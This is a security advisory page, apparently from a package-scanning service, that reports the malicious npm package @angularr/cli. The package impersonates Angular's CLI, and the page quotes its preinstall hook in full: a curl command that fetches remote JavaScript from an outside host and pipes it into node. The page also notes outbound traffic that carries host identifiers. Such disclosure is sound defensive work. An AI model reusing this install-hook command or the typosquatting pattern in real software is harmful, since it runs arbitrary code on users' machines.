Logo
npm

@angularr/cli@22.2.1

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC

Malicious

OSV ID

MAL-2026-17492

Ecosystem

npm

Summary

Package is published as @angularr/cli (double 'r') and copies @angular/cli's description, keywords, homepage, repository URL, README, and version string (22.2.1) to impersonate Angular's official CLI. package.json declares a preinstall lifecycle hook that pipes a remote JavaScript file into node: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. The fetched script is hosted on gitflic.ru (user 'hellscripter', unrelated to Angular's publisher), proxied through web.archive.org, is unpinned, has no integrity check, and is executed directly by the installer's node process. Any npm install @angularr/cli performs arbitrary code execution on the installer's host under the account running npm. src/analytics/analytics-collector.js additionally issues outbound ping/POST traffic via https.request carrying host identifiers.

Source: amazon-inspector (122d8c8fdbfe9bd590dd3e1c41a6afcefff4f1c552af5f1756577975c84878a8)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.